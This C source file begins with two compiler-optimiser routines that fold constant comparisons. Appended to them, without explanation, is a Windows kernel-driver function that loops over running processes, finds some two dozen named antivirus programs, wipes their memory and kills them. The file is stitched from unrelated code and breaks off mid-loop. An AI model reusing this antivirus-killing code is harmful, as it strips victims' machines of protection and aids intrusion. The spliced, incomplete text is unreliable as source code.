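static instruction *CmpRelocZero( instruction *ins, opcnt c, opcnt r )
/*********************************************************************
    Fold a two-operand comparison between a relocatable constant and
    the absolute constant zero.  Operand 'c' must be the zero and
    operand 'r' the relocatable name.  The folded truth table treats
    the relocatable value as non-zero (EQUAL -> false, NOT_EQUAL ->
    true, GREATER -> true), so the branch outcome is known and the
    compare is removed through KillCompare.
    Returns the instruction produced by KillCompare, or NULL when the
    instruction does not have the expected shape.
*/
{
    name    *cons;
    name    *rel;
    bool    truth;      /* value of "rel OP 0" for a non-zero rel */
    bool    ordered;    /* <, <=, >, >= : operand order matters */

    if( OpcodeNumOperands( ins ) != 2 )
        return( NULL );
    cons = ins->operands[c];
    if( cons->n.class != N_CONSTANT )
        return( NULL );
    if( cons->c.const_type != CONS_ABSOLUTE )
        return( NULL );
    if( CFTest( cons->c.value ) != 0 )
        return( NULL );
    rel = ins->operands[r];
    /* The c.* fields read below are only meaningful for a constant
       name; refuse any other name class instead of reading them. */
    if( rel->n.class != N_CONSTANT )
        return( NULL );
    /* NOTE(review): an offset in a segment that is not "near" is not
       folded; presumably such an offset may legitimately be zero —
       confirm against AskSegIsNear's contract. */
    if( rel->c.const_type == CONS_OFFSET && !AskSegIsNear( (segment_id)rel->c.lo.int_value ) )
        return( NULL );
    switch( ins->head.opcode ) {
    case OP_BIT_TEST_FALSE:
    case OP_CMP_EQUAL:
        /* NOTE(review): the bit-test cases share the truth value of the
           matching equality compare; not verified here against the
           OP_BIT_TEST_* semantics. */
        truth = false;
        ordered = false;
        break;
    case OP_CMP_LESS:
    case OP_CMP_LESS_EQUAL:
        truth = false;
        ordered = true;
        break;
    case OP_BIT_TEST_TRUE:
    case OP_CMP_NOT_EQUAL:
        truth = true;
        ordered = false;
        break;
    case OP_CMP_GREATER:
    case OP_CMP_GREATER_EQUAL:
        truth = true;
        ordered = true;
        break;
    default:
        /* not a comparison this routine knows how to fold */
        return( NULL );
    }
    if( !ActiveCompare( ins ) )
        return( NULL );
    /* With the zero as operand 0 the instruction reads "0 OP rel": the
       ordered comparisons reverse their outcome, while equality and
       bit tests are symmetric in their operands and keep theirs. */
    if( c != 1 && ordered )
        truth = !truth;
    if( truth ) {
        _SetBlockIndex( ins, _TrueIndex( ins ), _TrueIndex( ins ) );
    } else {
        _SetBlockIndex( ins, _FalseIndex( ins ), _FalseIndex( ins ) );
    }
    return( KillCompare( ins, AllocIntConst( truth ? FETrue() : 0 ) ) );
}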
static instruction *StraightLine( instruction *ins, tn fold, bool is_true )
/***************************************************************************
    See if we can turn a comparison into a straight line piece of code.
    'fold' is the folded form of the comparison.  When it names an
    absolute constant the branch is decided here: a zero constant
    inverts the requested sense 'is_true', then both block indices are
    pointed at the chosen successor and the compare is killed.
    Returns the instruction produced by KillCompare, or NULL when the
    folded value is not an absolute constant.
*/
{
    name    *value;

    value = TGetName( fold );
    if( value == NULL
      || value->n.class != N_CONSTANT
      || value->c.const_type != CONS_ABSOLUTE ) {
        return( NULL );
    }
    /* NOTE(review): only the low word is tested for zero here, whereas
       CmpRelocZero tests the constant with CFTest(); confirm this is
       the intended check for constants wider than one word. */
    if( value->c.lo.int_value == 0 ) {
        is_true = !is_true;
    }
    if( !is_true ) {
        _SetBlockIndex( ins, _FalseIndex( ins ), _FalseIndex( ins ) );
    } else {
        _SetBlockIndex( ins, _TrueIndex( ins ), _TrueIndex( ins ) );
    }
    return( KillCompare( ins, value ) );
}
void KillProcess(PVOID Context) { NTSTATUS status; HANDLE prohd; BOOLEAN bexe; ULONG puserAddress; KAPC_STATE ApcState; ANSI_STRING imagename; PEPROCESS pepro,ptempepro; LARGE_INTEGER timeout; PSE_AUDIT_PROCESS_CREATION_INFO papc; ANSI_STRING pastr; PVOID pstrb=NULL; while(TRUE) { pepro=PsGetCurrentProcess(); ptempepro=pepro; do { bexe=FALSE; RtlInitAnsiString(&imagename,(PVOID)((ULONG)ptempepro+eprooffset.ImageFileName)); //+0x174 ImageFileName papc=(PSE_AUDIT_PROCESS_CREATION_INFO)((ULONG)ptempepro+eprooffset.SE_AUDIT_PROCESS_CREATION_INFO);//EPROCESS偏移0x1f4处存放着_SE_AUDIT_PROCESS_CREATION_INFO结构的指针 __try { if (papc->ImageFileName->Name.Length!=0) { RtlUnicodeStringToAnsiString(&pastr,&papc->ImageFileName->Name,TRUE); pstrb=strstr(pastr.Buffer,"360"); if (pstrb!=NULL) { bexe=TRUE; } RtlFreeAnsiString(&pastr); } }__except(1){} KillCompare(&imagename,"360tray.exe",&bexe); KillCompare(&imagename,"360safe.exe",&bexe); KillCompare(&imagename,"ZhuDongFangYu.e",&bexe); KillCompare(&imagename,"360rp.exe",&bexe); KillCompare(&imagename,"360sd.exe",&bexe); KillCompare(&imagename,"qqpcrtp.exe",&bexe); KillCompare(&imagename,"qqpcleakscan.ex",&bexe); KillCompare(&imagename,"qqpctray.exe",&bexe); KillCompare(&imagename,"qqpcmgr.exe",&bexe); KillCompare(&imagename,"ksafe.exe",&bexe); KillCompare(&imagename,"kscan.exe",&bexe); KillCompare(&imagename,"kxescore.exe",&bexe); KillCompare(&imagename,"kxetray.exe",&bexe); KillCompare(&imagename,"ksafesvc.exe",&bexe); KillCompare(&imagename,"ksafetray.exe",&bexe); KillCompare(&imagename,"ksmgui.exe",&bexe); KillCompare(&imagename,"ksmsvc.exe",&bexe); KillCompare(&imagename,"avcenter.exe",&bexe); KillCompare(&imagename,"avgnt.exe",&bexe); KillCompare(&imagename,"avguard.exe",&bexe); KillCompare(&imagename,"avshadow.exe",&bexe); KillCompare(&imagename,"sched.exe",&bexe); KillCompare(&imagename,"ravmond.exe",&bexe); KillCompare(&imagename,"rsagent.exe",&bexe); KillCompare(&imagename,"rstray.exe",&bexe); 
KillCompare(&imagename,"rsmgrsvc.exe",&bexe); if (bexe) { KeStackAttachProcess(ptempepro,&ApcState); for(puserAddress=0;puserAddress<=0x7fffffff;puserAddress+=0x1000) { if(MmIsAddressValid((PVOID)puserAddress)) { __try { ProbeForWrite((PVOID)puserAddress,0x1000,sizeof(ULONG)); RtlZeroMemory((PVOID)puserAddress, 0x1000); }__except(1) { continue; } } else { if(puserAddress>0x1000000)//填这么多足够破坏进程数据了 { break; } } } KeUnstackDetachProcess(&ApcState); status=ObOpenObjectByPointer(ptempepro,0,NULL,PROCESS_ALL_ACCESS,*PsProcessType,KernelMode,&prohd); if (NT_SUCCESS(status)) { ZwTerminateProcess(prohd,0); ZwClose(prohd); } } ptempepro=(PEPROCESS)((ULONG)(*(PULONG)((ULONG)ptempepro+eprooffset.ActiveProcessLinks))-eprooffset.ActiveProcessLinks); //+0x088 ActiveProcessLinks : _LIST_ENTRY } while (ptempepro!=pepro);